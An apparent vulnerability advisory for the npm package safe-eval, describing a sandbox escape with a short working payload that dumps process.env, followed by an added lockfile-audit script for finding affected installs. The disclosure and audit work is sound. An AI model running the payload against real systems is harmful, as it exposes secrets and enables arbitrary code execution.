
Severity: Critical
EPSS: 0.00513% (0.65483 percentile)

Sandbox Breakout / Arbitrary Code Execution in safe-eval

Affected package: npm:safe-eval
Affected versions: <= 0.4.1
Fixed versions: No known fixed version

Dependent packages: 264
Dependent repositories: 2,730
Downloads last month: 187,874

Affected Version Ranges

All affected versions

0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.

Evaluating the following payload with safe-eval

(function (){
  var ex = new Error
  ex.__proto__ = null
  ex.stack = {
    match: x => {
      return x.constructor.constructor("throw process.env")()
    }
  }
  return ex
})()

prints the contents of process.env.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.
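Because no fixed version exists, the practical first step is to find every place safe-eval is installed in a project. The following is an added example, not code from this advisory or from the safe-eval project: it walks the "packages" map of a lockfileVersion 2/3 package-lock.json and reports each safe-eval install whose version falls inside the advisory's affected range (<= 0.4.1). The lock-file content is constructed sample data, and the version comparison ignores pre-release tags (an assumption made for brevity).

```javascript
// Added example: audit a package-lock.json (lockfileVersion 2/3 "packages" map)
// for safe-eval at an affected version (<= 0.4.1, per this advisory).
const AFFECTED_MAX = '0.4.1';

// Compare dotted numeric versions; pre-release tags are ignored (assumption).
// Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

function isAffected(version) {
  return compareVersions(version, AFFECTED_MAX) <= 0;
}

// Walk the "packages" map of a parsed lock file and return every install path
// of safe-eval (top-level or nested under another dependency) in the range.
function findVulnerableSafeEval(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // entries look like "node_modules/foo/node_modules/safe-eval"
    const isSafeEval =
      path === 'node_modules/safe-eval' || path.endsWith('/node_modules/safe-eval');
    if (isSafeEval && meta.version && isAffected(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Constructed sample lock file: one direct and one transitive safe-eval install.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'sample-app', version: '1.0.0' },
    'node_modules/safe-eval': { version: '0.4.1' },
    'node_modules/some-lib': { version: '2.3.0' },
    'node_modules/some-lib/node_modules/safe-eval': { version: '0.3.0' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of findVulnerableSafeEval(SAMPLE_LOCK)) {
    console.log(`${hit.path}@${hit.version} is affected (<= ${AFFECTED_MAX})`);
  }
}
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`; npm v7+ lock files carry the "packages" map this reads.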
